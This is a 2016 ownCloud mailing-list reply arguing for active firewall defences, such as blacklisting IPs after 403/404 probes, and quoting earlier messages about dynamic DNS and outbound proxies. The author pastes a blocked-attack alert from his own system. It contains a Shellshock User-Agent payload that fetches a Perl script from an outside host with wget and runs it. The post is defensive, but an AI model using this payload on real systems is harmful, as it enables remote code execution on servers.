IMHO - dynamic DNS is a lame excuse for security. You could just install Windows + 2 AV and claim it is more secure (which is crap of course).
Static IP is Ok IMHO. What is required is for the system to have an active defense, and that can only be achieved if the owncloud system has access to the firewall somehow. Dynamic blacklisting by example. A very simple approach by example would be to use the return codes of the WebServer. - 403 - access denied would mean someone is trying to access a resource without proper permissions -> enter client-IP into a blacklist for 24Hours - 404 - some is accessing a non-existing resource. This is typical for resource probing (check /admin/config.php by example). If that file does not exist, this is definitely a resource probing for a following attack. That - is something websites should develop and include into their code. I went even further on my site with that. Having also a dedicated access to my firewall, I do not only block the client-IP, but also terminate all existing connections at the same time. I have of course a way more complex system setup - also based on URL reputation. After the first attack that came in, the request-URL is store in a DB, and based on if I have configured that URL to not lock the requester, the first attempt will lock the client-IP hard immediately. Have an average of 4000 attack vectors (That's how I call these URL) per Year. Look at the below attack attempt I had - the system has locked it down hard in the attempt. Dear Admin, The following new blacklist entry has been submitted. You might got to the Details page by following this link https://stargate.solsys.org/admin.php? op=blacklist&action=edit&position=0&blacklist=177.140.117.69 Blacklist Content ================================================================================ -> 2016-05-29 @ 14:35:47 Breaking attempt ? Module/Function: core/error User Agent: () { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo 333:; cd /tmp;wget http://www.saninji.jp/files/.config/b.txt;perl b.txt; rm - rf b.txt; echo 333:; id;" Referer: Request: /cgi-bin/status/status.cgi Firewall report: * Entered IP 177.140.117.69 into blacklist - Removed active connection *2CA02 [177.140.117.69:23309 -> 192.168.1.2:443] - Removed active connection *2CA0A [177.140.117.69:9920 -> 192.168.1.2:80] - Removed active connection *2CA0C [177.140.117.69:25142 -> 192.168.1.2:443] - Removed active connection *2CA2F [177.140.117.69:46762 -> 192.168.1.2:80] - Removed active connection *2CA30 [177.140.117.69:24306 -> 192.168.1.2:443] - Removed active connection *2CA3B [177.140.117.69:37394 -> 192.168.1.2:443] I stopped putting systems I have not developed or at least thoroughly tested myself directly onto the net. I still not trust owncloud enough to put it on the net. No active defenses :} On Tuesday, May 31, 2016 12:33:42 AM CEST Andreas Hechenberger wrote: > Hey Alvar and rest, > > i am not sure if it is a good idea to have fixed IP addresses because > this allows more attacks (spoofing etc.) and providers/companies etc. > could also slow down or worse block the traffic to those IP's. > > it could be nice to have both ^^ > @Michal write your own script which add/remove the IP's dynamical to > your firewall. i know its a hacky workaround but it could work ^^ > > Servus > Andy > > On 05/30/2016 06:40 PM, Alvar Freude wrote: > > Am 2016-05-30 18:11, schrieb Stefan Schwarz: > >> Owncloud does not provide you with a dyndns-service which could list > >> your server. > > > > He has an other problem: his internal OwnCloud server should contact the > > outside Owncloud update servers, but outgoing connections are > > firewalled. He does not use, as far as i understand, a home server with > > DynDNS. In contrast to many PHP-installations, he blocks outging traffic > > on purpose. > > > > This is a good idea. A very good idea. > > > > > > But AFAIK it is not guaranteed, which server/IP OwnCloud contacts for > > updating etc. Some apps may contact their own server, the core contacts > > some AWS IPs, which may change? > > > > Because of this, I use a proxy. Owncloud itself is here in a FreeBSD > > Jail with private IP on private interface lo23, but with the correct > > proxy setting it can connect everywhere. This is not a very good config, > > because security by obscurity – but better then nothing (a typical > > script kiddie attacker who 0wned my OwnCloud would try to access outside > > directly). > > > > > > So, it would be a good idea, if OwnCloud defines fixed systems which may > > be contacted by the Owncloud Core Appliaction and Apps by default. > > > > > > Ciao > > > > Alvar -- Stop searching forever. Happiness is just next to you. ------------------------------------------------------------------------ Joerg Mertin in Clermont/France Web: http://www.solsys.org - Linux user #172509 PGP: Public Key Server - Get "0x159DC660F946126F" _______________________________________________ User mailing list [email protected] http://mailman.owncloud.org/mailman/listinfo/user
